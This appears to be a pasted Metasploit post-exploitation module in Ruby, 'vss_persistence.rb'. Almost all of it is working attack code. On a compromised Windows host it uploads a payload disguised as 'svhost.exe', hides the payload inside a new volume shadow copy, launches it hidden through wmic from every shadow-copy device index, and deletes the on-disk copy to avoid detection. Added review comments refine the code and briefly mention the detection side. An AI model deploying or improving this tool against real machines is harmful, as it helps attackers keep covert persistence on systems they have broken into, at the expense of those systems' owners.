
vss_persistence.rb by @MrXors

Sep 19th, 2013
  1. require 'msf/core'
  2. require 'rex'
  3. require 'msf/core/post/windows/shadowcopy'
  4. require 'msf/core/post/windows/priv'
  5. require 'msf/core/post/common'
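class Metasploit4 < Msf::Post

  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::ShadowCopy
  include Msf::Post::Common

  # Indexes N of \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN that are
  # tried when the payload is launched.
  # NOTE(review): the index of the copy returned by create_shadowcopy is not
  # derived from its ID here, so every index in this range is attempted
  # (same brute-force behaviour as the original loop).
  SHADOW_COPY_INDEXES = (0..30).freeze

  def initialize(info={})

    super(update_info(info,
      'Name'                 => "Windows Manage Create Persistant Payload in Shadow Copy",
      'Description'          => %q{
        This module will attempt to create a persistant payload
        in new volume shadow copy.This is based on the VSSOwn
        Script originally posted by Tim Tomes and Mark Baggett.
        Works on win2k3 and later.
        },
      'License'              => MSF_LICENSE,
      'Platform'             => ['win'],
      'SessionTypes'         => ['meterpreter'],
      'Author'               => ['MrXors'],
      'References'           => [[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]]
    ))

    register_options(
      [
        OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\']),
        OptString.new('PATH', [ true, 'Path to exe on local system.'])
      ], self.class)
  end

  # Uploads +file+ from the attacker's filesystem to the target.
  #
  # @param session the meterpreter session to upload through
  # @param file [String] local path of the file to upload
  # @param trgloc [String] target directory; "" (or nil) means the session's %TEMP%
  # @return [String] the path the file was written to on the target
  # @raise [RuntimeError] if +file+ does not exist locally; upload errors are
  #   printed and re-raised
  #
  # .exe payloads are written as svhost<N>.exe (a name chosen to resemble
  # svchost.exe); anything else becomes TMP<N><ext>, where <ext> is the
  # local file's extension ("" if it has none). N is rand(100), so two runs
  # can pick the same name; nothing here checks for an existing file.
  def upload(session, file, trgloc = "")
    raise "File to Upload does not exists!" unless ::File.exist?(file)

    location = trgloc.to_s.empty? ? session.fs.file.expand_path("%TEMP%") : trgloc
    # Drop a trailing '\' so a caller passing "C:\" does not produce "C:\\name".
    location = location.chomp("\\")

    # File.extname returns "" for a file with no dot; the original
    # rindex-based slice raised a TypeError in that case.
    ext = ::File.extname(file)
    file_name = if ext.downcase == ".exe"
                  "svhost#{rand(100)}.exe"
                else
                  "TMP#{rand(100)}#{ext}"
                end
    fileontrgt = "#{location}\\#{file_name}"

    begin
      print_status("\tUploading #{file}....")
      session.fs.file.upload_file(fileontrgt, file)
      print_status("\t#{file} uploaded!")
      print_status("\tUploaded as #{fileontrgt}")
    rescue ::StandardError => e
      print_status("Error uploading file #{file}: #{e.class} #{e}")
      raise
    end

    fileontrgt
  end

  # Module entry point.
  #
  # Order matters: the privilege, UAC and VSS checks run before anything is
  # written to the target so that a run which cannot proceed leaves no file
  # behind (the original uploaded first and only then checked). The payload is
  # dropped at the root of VOLUME, a shadow copy of VOLUME is taken (so the
  # copy contains the file), the payload is launched from the shadow-copy
  # device path, and finally the on-disk original is deleted -- the copy inside
  # the snapshot is what remains.
  def run
    unless is_admin?
      print_error("This module requires admin privs to run")
      return
    end
    if is_uac_enabled?
      print_error("This module requires UAC to be bypassed first")
      return
    end
    return unless start_vss

    volume = datastore['VOLUME']
    print_status("Uploading Payload to machine.")
    # Upload to the volume being snapshotted rather than a hard-coded "C:\";
    # with the default VOLUME this is the same location as before, but a
    # non-C: volume would otherwise never contain the file in its shadow copy.
    fileontrgt = upload(session, datastore['PATH'], volume)

    id = create_shadowcopy(volume)
    unless id
      # Without a snapshot there is nothing to persist in; remove the upload
      # rather than leaving it on disk.
      print_error("Shadow copy of #{volume} was not created, removing #{fileontrgt}")
      delete_on_target(fileontrgt)
      return
    end
    print_good "Shadow Copy #{id} created!"

    launch_from_shadow_copy(fileontrgt)

    # Delete the same path that was uploaded to (the original hard-coded
    # "C:\<name>", which diverged from the printed path for any other trgloc).
    print_good("Deleting Malware #{fileontrgt}!")
    delete_on_target(fileontrgt)
  end

  private

  # Path of +target_path+ relative to the root of its volume, i.e. the part
  # appended after \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\.
  # Assumes a drive-letter volume such as "C:\" -- TODO confirm for VOLUME
  # values given in any other form.
  def shadow_copy_relative_path(target_path)
    target_path.sub(/\A[A-Za-z]:\\+/, '')
  end

  # Launches the payload from every candidate shadow-copy device via wmic.
  # Indexes that do not exist, or do not contain the file, simply fail inside
  # wmic. Each spawned cmd.exe is closed so the session does not accumulate
  # one open process handle per index. This wmic command line is presumably
  # the most visible on-host artifact of the module -- worth knowing on the
  # detection side.
  def launch_from_shadow_copy(target_path)
    rel = shadow_copy_relative_path(target_path)
    SHADOW_COPY_INDEXES.each do |digit|
      cmd = "cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create " \
            "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{digit}\\#{rel}"
      child = session.sys.process.execute(cmd, nil, {'Hidden' => true})
      child.close
    end
  end

  # Removes +target_path+ on the target with cmd.exe's del. The path is
  # quoted so a location containing spaces cannot turn into several
  # arguments (or, with an empty name, into "del C:\" against the whole root).
  def delete_on_target(target_path)
    child = session.sys.process.execute("cmd.exe /c del \"#{target_path}\"", nil, {'Hidden' => true})
    child.close
  end
end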